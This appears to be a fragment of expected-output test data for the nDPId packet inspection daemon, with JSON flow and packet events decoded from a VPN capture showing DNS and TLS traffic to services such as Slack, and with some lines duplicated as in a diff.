00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1569687248620,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1569687248620,"pkt":"MzMAAAAWGIEORo7Iht1gAAAAACQAAf6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPANy0AAAAAQQAAAD\/AgAAAAAAAAAAAAAAAAD7"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687249612,"flow_last_seen":1569687249612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687249612,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1569687249612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687249612,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoT2EAAEAGMCYKAADjuBk4Td5VAFBor5ytCT1EPVAQEAlzBQAA"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687249612,"flow_last_seen":1569687249612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687249612,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1569687249612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687249612,"pkt":"LH6BsEqhNDY7z3UoCABFAAAogHcAAEAG\/w8KAADjuBk4Td40AFBjyKiAGk9l7lAQEAA5gAAA"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0NJhAADcGE+O4GThNCgAA4wBQ3jQaT2XuY8iogYAQAPO0OwAAAQEICuMU+IIcDWOU"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0uJpAADgGjuC4GThNCgAA4wBQ3lUJPUQ9aK+croAQAOvt6gAAAQEICuMU+IIcDWN7"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687249612,"flow_last_seen":1569687249612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687249612,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1569687249612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687249612,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoT2EAAEAGMCYKAADjuBk4Td5VAFBor5ytCT1EPVAQEAlzBQAA"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687249612,"flow_last_seen":1569687249612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687249612,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1569687249612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687249612,"pkt":"LH6BsEqhNDY7z3UoCABFAAAogHcAAEAG\/w8KAADjuBk4Td40AFBjyKiAGk9l7lAQEAA5gAAA"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0NJhAADcGE+O4GThNCgAA4wBQ3jQaT2XuY8iogYAQAPO0OwAAAQEICuMU+IIcDWOU"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0uJpAADgGjuC4GThNCgAA4wBQ3lUJPUQ9aK+croAQAOvt6gAAAQEICuMU+IIcDWN7"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1569687251177,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1569687251177,"pkt":"LH6BsEqhNDY7z3UoCABFAAA+HQ0AAP8R\/CcKAADjS0tMTNZDADUAKtGSphcBAAABAAAAAAAABXByaW50BnZpYXNhdANjb20AAAEAAQ=="}
00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -112,29 +112,29 @@
00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687255989,"flow_last_seen":1569687255989,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687255989,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1569687256018,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1569687256018,"pkt":"NDY7z3UoLH6BsEqhCABFAABHAABAADcRoSxLS0xMCgAA4wA14ysAM\/asjyeBgAABAAEAAAAABXNsYWNrA2NvbQAAAQABwAwAAQABAAAAIwAEY1YinA=="}
00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"99.86.34.156"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687256018,"flow_last_seen":1569687256018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569687256018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687256018,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGqeMKAADjY1YinN5YAbvhhxKGAAAAALAC\/\/8SKwAAAgQFtAEDAwUBAQgKHA2jzgAAAAAEAgAA"}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569687256050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687256050,"pkt":"NDY7z3UoLH6BsEqhCABFAAA8AABAAO4G++ZjViKcCgAA4wG73lg6Ai8I4YcSh6AScSDdlgAAAgQFtAQCCApVvxWbHA2jzgEDAwg="}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569687256050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687256050,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGqe8KAADjY1YinN5YAbvhhxKHOgIvCYAQEBVtUAAAAQEIChwNo+1VvxWb"}
00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687256018,"flow_last_seen":1569687256050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569687256050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687256018,"flow_last_seen":1569687256093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687256093,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687256018,"flow_last_seen":1569687256018,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569687256018,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687256018,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGqeMKAADjY1YinN5YAbvhhxKGAAAAALAC\/\/8SKwAAAgQFtAEDAwUBAQgKHA2jzgAAAAAEAgAA"}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569687256050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687256050,"pkt":"NDY7z3UoLH6BsEqhCABFAAA8AABAAO4G++ZjViKcCgAA4wG73lg6Ai8I4YcSh6AScSDdlgAAAgQFtAQCCApVvxWbHA2jzgEDAwg="}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569687256050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687256050,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGqe8KAADjY1YinN5YAbvhhxKHOgIvCYAQEBVtUAAAAQEIChwNo+1VvxWb"}
00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687256018,"flow_last_seen":1569687256050,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569687256050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687256018,"flow_last_seen":1569687256093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687256093,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1569687259269,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1569687259269,"pkt":"AQBeAAD7GIEORo7ICABFAACMyOAAAP8RBrAKAADV4AAA+xTpFOkAeGDGAAAAAAADAAAAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMgAEAACkFoAAAEZQAEgAEAA4AmzqBDkaOyBiBDkaOyA=="}
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569687259270,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687259270,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AHgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QB4u7wAAAAAAAMAAAAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAyAAQAAKQWgAAARlAASAAQADgCbOoEORo7IGIEORo7I"}
00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1569687259297,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1569687259297,"pkt":"GIEORo7INDY7z3UoCABFAAEEsFAAAP8R9OAKAADjCgAA1RTpFOkA8ADKAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABQRTFAtUktFUlVSLU9TWCAoOSnADMAyACGAAQAAAHgADQAAAADbaQRuRFBJwCHAMgAQgAEAABGUACIWcnBCQT0zNzoyRTo0Nzo2RDoxODo1NApycFZyPTE1Mi4xEUxQLVJLRVJVUi1PU1ggKDkpDF9kZXZpY2UtaW5mb8AcABAAAQAAEZQAIBRtb2RlbD1NYWNCb29rUHJvMTEsMQpvc3h2ZXJzPTE3wFgAAYABAAAAeAAECgAA4w=="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1569687259694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687259694,"pkt":"LH6BsEqhNDY7z3UoCABFAAAo3\/wAAEAGn4oKAADjuBk4Td5VAFBor5ytCT1EPVAQEAlzBQAA"}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1569687259694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687259694,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoLkYAAEAGUUEKAADjuBk4Td40AFBjyKiAGk9l7lAQEAA5gAAA"}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1569687259694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687259694,"pkt":"LH6BsEqhNDY7z3UoCABFAAAo3\/wAAEAGn4oKAADjuBk4Td5VAFBor5ytCT1EPVAQEAlzBQAA"}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1569687259694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687259694,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoLkYAAEAGUUEKAADjuBk4Td40AFBjyKiAGk9l7lAQEAA5gAAA"}
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1569687260293,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687260293,"pkt":"AQBeAAACGIEORo7ICABGAAAgPP4AAAEC\/QIKAADV4AAAApQEAAAXAAgE4AAA+w=="}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1569687260293,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687260293,"pkt":"AQBeAAD7GIEORo7ICABGAAAgpGYAAAEClKEKAADV4AAA+5QEAAAWAAkE4AAA+w=="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260469,"flow_last_seen":1569687260469,"flow_idle_time":7440000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":1,"thread_ts_msec":1569687260469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1569687260469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1569687260469,"pkt":"LH6BsEqhNDY7z3UoCABFAABaAABAAEAGj+kKAADjI8l8Cd5OAbsN94yysPePlIAYEACJPAAAAQEIChwNtRgGQIQkFwMDACEAAAAAAAAAA3VW6sM2CHDT\/Oy2e1MF3bFmEvrGQamtRJY="}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1569687260489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260489,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0Bk0AAHoGj8IjyXwJCgAA4wG73k6w94+UDfeM2IAQAPROCgAAAQEICgZA6j4cDbUY"}
